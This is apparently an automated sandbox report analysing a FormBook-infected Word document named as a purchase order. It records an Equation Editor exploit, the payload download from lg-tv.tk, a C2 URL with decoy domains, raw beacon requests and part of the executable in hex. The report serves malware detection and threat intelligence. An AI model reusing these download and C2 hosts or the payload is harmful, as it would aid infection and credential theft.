Windows Analysis Report RFQ9003930 New Order.doc

AV Detection:

Found malware configuration

Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}

Multi AV Scanner detection for submitted file

Source: RFQ9003930 New Order.doc	Virustotal: Detection: 28%			Perma Link
Source: RFQ9003930 New Order.doc	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://lg-tv.tk/harshmanzx.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: lg-tv.tk

Virustotal: Detection: 15%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	ReversingLabs: Detection: 28%

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.hasmenhtk721.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.hasmenhtk721.exe.516810.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 5.2.hasmenhtk721.exe.30000.0.unpack	Avira: Label: TR/ATRAPS.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: hasmenhtk721.exe, rundll32.exe
Source:	Binary string: rundll32.pdb source: hasmenhtk721.exe, 00000005.00000002.477204185.0000000000504000.00000004.00000020.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: lg-tv.tk

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4x nop then jmp 020B9F29h		4_2_020B9144
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4x nop then jmp 020B9F29h		4_2_020B9EB0

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.ceasa.club
Source: C:\Windows\explorer.exe	Network Connect: 166.62.10.138 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eastwestasia-thailand.com
Source: C:\Windows\explorer.exe	Domain query: www.alzayantourism.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.eastwestasia-thailand.com/hht8/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS HTTP/1.1Host: www.ceasa.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS HTTP/1.1Host: www.alzayantourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 12:10:55 GMTContent-Type: application/x-msdownloadContent-Length: 860672Last-Modified: Mon, 27 Sep 2021 01:40:53 GMTConnection: keep-aliveETag: "61512125-d2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 16 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 0b 00 00 98 01 00 00 00 00 00 d2 a7 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 a7 0b 00 4f 00 00 00 00 c0 0b 00 4c 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d8 87 0b 00 00 20 00 00 00 88 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 94 01 00 00 c0 0b 00 00 96 01 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 a7 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 98 53 02 00 03 00 00 00 8c 02 00 06 80 20 04 00 00 87 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /harshmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 12:12:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.463735774.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.524424919.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.465121306.000000000457A000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%SP&
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.526196234.0000000006998000.00000004.00000001.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpP
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpp7P&
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: hasmenhtk721.exe, hasmenhtk721.exe, 00000005.00000002.477585914.0000000000BB2000.00000020.00020000.sdmp, rundll32.exe, 00000007.00000002.689308196.000000000297F000.00000004.00020000.sdmp	String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: rundll32.exe, 00000007.00000002.687912548.0000000000720000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.456117807.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.524604112.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.468389644.000000000840D000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1enu
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78388EE1-378B-4475-870B-E925774DE169}.tmp

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: lg-tv.tk

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /harshmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS HTTP/1.1Host: www.ceasa.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS HTTP/1.1Host: www.alzayantourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to dropped file

.NET source code contains very large strings

Source: harshmanzx[1].exe.2.dr, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: hasmenhtk721.exe.2.dr, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 4.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 4.2.hasmenhtk721.exe.bb0000.2.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 5.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 5.2.hasmenhtk721.exe.bb0000.3.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816

Yara signature match

Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
